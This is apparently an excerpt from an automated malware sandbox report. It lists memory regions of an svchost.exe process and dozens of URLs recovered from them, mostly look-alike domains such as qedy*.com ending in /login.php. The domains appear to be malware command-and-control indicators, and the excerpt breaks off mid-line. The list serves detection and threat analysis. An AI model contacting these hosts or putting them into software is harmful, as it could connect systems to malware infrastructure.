Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384540926.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376887527.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772865274.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2769955415.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375570190.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384725083.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375509475.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771520849.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyniv.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyqig.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyrel.com/http://qebyrel.com/http://vopycoc.com/http://lykygun.com/
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyrel.com/http://qetyxiv.com/http://vopycoc.com/http://lykygun.com/0
Source: svchost.exe, 00000002.00000003.2440992752.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyrev.com/H
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyrev.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebysul.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2554933604.0000000005813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyvop.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyvyl.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qebyxyq.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyfog.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566181125.000000000573E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyhyl.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedykep.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307644873.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedykiv.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyleq.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedylig.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedynaq.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156423614.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2167507417.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3282956262.000000000339A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedynul.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyqup.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyrag.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752503084.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyruv.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedytoq.com/
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350369303.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedytoq.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedytul.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197046.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyveg.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qedyvuv.com/login.php
Source: svchost.exe, 00000002.00000003.2440992752.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyfyp.com/H
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198550241.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198486951.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyfyp.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 